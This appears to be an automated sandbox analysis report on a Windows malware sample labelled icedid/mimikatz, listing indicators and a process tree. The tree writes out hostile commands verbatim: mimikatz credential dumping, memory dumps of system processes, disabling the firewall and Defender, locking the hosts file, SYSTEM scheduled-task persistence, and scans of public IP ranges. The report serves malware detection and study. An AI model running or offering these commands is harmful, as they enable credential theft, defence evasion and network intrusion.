\REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump entlmlitm.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" entlmlitm.exe -
Modifies registry class 14 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" iylstni.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" iylstni.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ iylstni.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4656 PING.EXE -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found 672 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 5076 2024-05-02_9678346907a855cfe9695d5570d4ddf9_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 25 IoCs
description pid Process Token: SeDebugPrivilege 5076 2024-05-02_9678346907a855cfe9695d5570d4ddf9_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 3084 iylstni.exe Token: SeDebugPrivilege 3168 iylstni.exe Token: SeDebugPrivilege 5092 vfshost.exe Token: SeDebugPrivilege 4316 entlmlitm.exe Token: SeLockMemoryPrivilege 3628 lslnam.exe Token: SeLockMemoryPrivilege 3628 lslnam.exe Token: SeDebugPrivilege 1800 entlmlitm.exe Token: SeDebugPrivilege 1972 entlmlitm.exe Token: SeDebugPrivilege 2988 entlmlitm.exe Token: SeDebugPrivilege 3004 entlmlitm.exe Token: SeDebugPrivilege 2064 entlmlitm.exe Token: SeDebugPrivilege 4604 entlmlitm.exe Token: SeDebugPrivilege 1692 entlmlitm.exe Token: SeDebugPrivilege 1892 entlmlitm.exe Token: SeDebugPrivilege 2844 entlmlitm.exe Token: SeDebugPrivilege 2760 entlmlitm.exe Token: SeDebugPrivilege 832 entlmlitm.exe Token: SeDebugPrivilege 5092 entlmlitm.exe Token: SeDebugPrivilege 1528 entlmlitm.exe Token: SeDebugPrivilege 6400 entlmlitm.exe Token: SeDebugPrivilege 5152 entlmlitm.exe Token: SeDebugPrivilege 636 entlmlitm.exe Token: SeDebugPrivilege 4512 entlmlitm.exe Token: SeDebugPrivilege 4240 entlmlitm.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 5076 2024-05-02_9678346907a855cfe9695d5570d4ddf9_hacktools_icedid_mimikatz.exe 5076 2024-05-02_9678346907a855cfe9695d5570d4ddf9_hacktools_icedid_mimikatz.exe 3084 iylstni.exe 3084 iylstni.exe 3168 iylstni.exe 3168 iylstni.exe 1872 xohudmc.exe 1764 gykgye.exe 3812 iylstni.exe 3812 iylstni.exe 3308 iylstni.exe 3308 iylstni.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5076 wrote to memory of 4048 5076 2024-05-02_9678346907a855cfe9695d5570d4ddf9_hacktools_icedid_mimikatz.exe 90 PID 5076 wrote to memory of 4048 5076 2024-05-02_9678346907a855cfe9695d5570d4ddf9_hacktools_icedid_mimikatz.exe 90 PID 5076 wrote to memory of 4048 5076 2024-05-02_9678346907a855cfe9695d5570d4ddf9_hacktools_icedid_mimikatz.exe 90 PID 4048 wrote to memory of 4656 4048 cmd.exe 92 PID 4048 wrote to memory of 4656 4048 cmd.exe 92 PID 4048 wrote to memory of 4656 4048 cmd.exe 92 PID 4048 wrote to memory of 3084 4048 cmd.exe 93 PID 4048 wrote to memory of 3084 4048 cmd.exe 93 PID 4048 wrote to memory of 3084 4048 cmd.exe 93 PID 3168 wrote to memory of 544 3168 iylstni.exe 95 PID 3168 wrote to memory of 544 3168 iylstni.exe 95 PID 3168 wrote to memory of 544 3168 iylstni.exe 95 PID 544 wrote to memory of 3004 544 cmd.exe 97 PID 544 wrote to memory of 3004 544 cmd.exe 97 PID 544 wrote to memory of 3004 544 cmd.exe 97 PID 544 wrote to memory of 2764 544 cmd.exe 98 PID 544 wrote to memory of 2764 544 cmd.exe 98 PID 544 wrote to memory of 2764 544 cmd.exe 98 PID 544 wrote to memory of 832 544 cmd.exe 99 PID 544 wrote to memory of 832 544 cmd.exe 99 PID 544 wrote to memory of 832 544 cmd.exe 99 PID 544 wrote to memory of 2240 544 cmd.exe 100 PID 544 wrote to memory of 2240 544 cmd.exe 100 PID 544 wrote to memory of 2240 544 cmd.exe 100 PID 544 wrote to memory of 2728 544 cmd.exe 101 PID 544 wrote to memory of 2728 544 cmd.exe 101 PID 544 wrote to memory of 2728 544 cmd.exe 101 PID 544 wrote to memory of 3000 544 cmd.exe 102 PID 544 wrote to memory of 3000 544 cmd.exe 102 PID 544 wrote to memory of 3000 544 cmd.exe 102 PID 3168 wrote to memory of 4276 3168 iylstni.exe 103 PID 3168 wrote to memory of 4276 3168 iylstni.exe 103 PID 3168 wrote to memory of 4276 3168 iylstni.exe 103 PID 3168 wrote to memory of 3532 3168 iylstni.exe 105 PID 3168 wrote to memory of 3532 3168 iylstni.exe 105 PID 3168 wrote to memory of 3532 3168 iylstni.exe 105 PID 3168 wrote to memory of 2680 3168 iylstni.exe 107 PID 3168 wrote to memory of 2680 3168 iylstni.exe 107 PID 3168 wrote to memory of 2680 3168 iylstni.exe 107 PID 3168 wrote to memory of 2908 3168 iylstni.exe 116 PID 3168 wrote to memory of 2908 3168 iylstni.exe 116 PID 3168 wrote to memory of 2908 3168 iylstni.exe 116 PID 2908 wrote to memory of 4388 2908 cmd.exe 118 PID 2908 wrote to memory of 4388 2908 cmd.exe 118 PID 2908 wrote to memory of 4388 2908 cmd.exe 118 PID 4388 wrote to memory of 3796 4388 wpcap.exe 120 PID 4388 wrote to memory of 3796 4388 wpcap.exe 120 PID 4388 wrote to memory of 3796 4388 wpcap.exe 120 PID 3796 wrote to memory of 2448 3796 net.exe 122 PID 3796 wrote to memory of 2448 3796 net.exe 122 PID 3796 wrote to memory of 2448 3796 net.exe 122 PID 4388 wrote to memory of 3992 4388 wpcap.exe 123 PID 4388 wrote to memory of 3992 4388 wpcap.exe 123 PID 4388 wrote to memory of 3992 4388 wpcap.exe 123 PID 3992 wrote to memory of 4132 3992 net.exe 125 PID 3992 wrote to memory of 4132 3992 net.exe 125 PID 3992 wrote to memory of 4132 3992 net.exe 125 PID 4388 wrote to memory of 560 4388 wpcap.exe 126 PID 4388 wrote to memory of 560 4388 wpcap.exe 126 PID 4388 wrote to memory of 560 4388 wpcap.exe 126 PID 560 wrote to memory of 1764 560 net.exe 128 PID 560 wrote to memory of 1764 560 net.exe 128 PID 560 wrote to memory of 1764 560 net.exe 128 PID 4388 wrote to memory of 2240 4388 wpcap.exe 129
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1896
-
C:\Windows\TEMP\bestbnuee\lslnam.exe"C:\Windows\TEMP\bestbnuee\lslnam.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3628
-
-
C:\Users\Admin\AppData\Local\Temp\2024-05-02_9678346907a855cfe9695d5570d4ddf9_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-05-02_9678346907a855cfe9695d5570d4ddf9_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:5076 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\nlmttyea\iylstni.exe2⤵
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
PID:4656
-
-
C:\Windows\nlmttyea\iylstni.exeC:\Windows\nlmttyea\iylstni.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3084
-
-
-
C:\Windows\nlmttyea\iylstni.exeC:\Windows\nlmttyea\iylstni.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3168 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
PID:544 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3004
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:2764
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:832
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:2240
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2728
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:3000
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵PID:4276
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵PID:3532
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵PID:2680
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nbuyiybyv\smnabayei\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:2908 -
C:\Windows\nbuyiybyv\smnabayei\wpcap.exeC:\Windows\nbuyiybyv\smnabayei\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:4388 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3796 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:2448
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:3992 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵PID:4132
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
PID:560 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵PID:1764
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵PID:2240
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵PID:4604
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:1400
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:3596
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:1780
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:4540
-
C:\Windows\SysWOW64\net.exenet start npf3⤵PID:2144
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:224
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nbuyiybyv\smnabayei\tttqsriea.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nbuyiybyv\smnabayei\Scant.txt2⤵PID:2724
-
C:\Windows\nbuyiybyv\smnabayei\tttqsriea.exeC:\Windows\nbuyiybyv\smnabayei\tttqsriea.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\nbuyiybyv\smnabayei\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:3104
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\nbuyiybyv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\nbuyiybyv\Corporate\log.txt2⤵
- Drops file in Windows directory
PID:1560 -
C:\Windows\nbuyiybyv\Corporate\vfshost.exeC:\Windows\nbuyiybyv\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5092
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "vlmtratem" /ru system /tr "cmd /c C:\Windows\ime\iylstni.exe"2⤵PID:1420
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3256
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "vlmtratem" /ru system /tr "cmd /c C:\Windows\ime\iylstni.exe"3⤵
- Creates scheduled task(s)
PID:3700
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "tyitsyimt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nlmttyea\iylstni.exe /p everyone:F"2⤵PID:3992
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:2808
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "tyitsyimt" /ru system /tr "cmd /c echo Y|cacls C:\Windows\nlmttyea\iylstni.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:3064
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "numblgjvc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bestbnuee\lslnam.exe /p everyone:F"2⤵PID:2448
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:3616
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "numblgjvc" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bestbnuee\lslnam.exe /p everyone:F"3⤵
- Creates scheduled task(s)
PID:2712
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵PID:2064
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵PID:1520
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:784
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:1568
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵PID:2564
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵PID:2100
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:4084
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:4384
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵PID:4136
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 800 C:\Windows\TEMP\nbuyiybyv\800.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4316
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵PID:3000
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵PID:832
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵PID:2828
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵PID:4788
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵PID:1020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵PID:3788
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵PID:3700
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
PID:3780
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵PID:4048
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
PID:2680
-
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 336 C:\Windows\TEMP\nbuyiybyv\336.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1800
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵PID:2684
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵PID:3652
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵PID:3256
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵PID:1612
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵PID:4576
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵PID:2128
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵PID:2100
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵PID:4448
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵PID:2464
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵PID:3308
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
PID:920
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵PID:4336
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
PID:832
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵PID:404
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
PID:2964
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵PID:4372
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
PID:3000
-
-
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
PID:1872
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 1896 C:\Windows\TEMP\nbuyiybyv\1896.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1972
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 2480 C:\Windows\TEMP\nbuyiybyv\2480.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2988
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 2820 C:\Windows\TEMP\nbuyiybyv\2820.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:3004
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 3036 C:\Windows\TEMP\nbuyiybyv\3036.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2064
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 2472 C:\Windows\TEMP\nbuyiybyv\2472.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:4604
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 3708 C:\Windows\TEMP\nbuyiybyv\3708.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1692
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 3844 C:\Windows\TEMP\nbuyiybyv\3844.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1892
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 3928 C:\Windows\TEMP\nbuyiybyv\3928.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2844
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 4012 C:\Windows\TEMP\nbuyiybyv\4012.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:2760
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 3600 C:\Windows\TEMP\nbuyiybyv\3600.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:832
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 3540 C:\Windows\TEMP\nbuyiybyv\3540.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:5092
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 4660 C:\Windows\TEMP\nbuyiybyv\4660.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:1528
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\nbuyiybyv\smnabayei\scan.bat2⤵PID:4348
-
C:\Windows\nbuyiybyv\smnabayei\aubeaujvt.exeaubeaujvt.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3584
-
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 3120 C:\Windows\TEMP\nbuyiybyv\3120.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
PID:6400
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵PID:4820
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5276
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵PID:184
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1768
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵PID:5144
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:5240
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵PID:5200
-
-
-
C:\Windows\TEMP\nbuyiybyv\entlmlitm.exeC:\Windows\TEMP\nbuyiybyv\entlmlitm.exe -accepteula -mp 3496 C:\Windows\TEMP\nbuyiybyv\3496.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
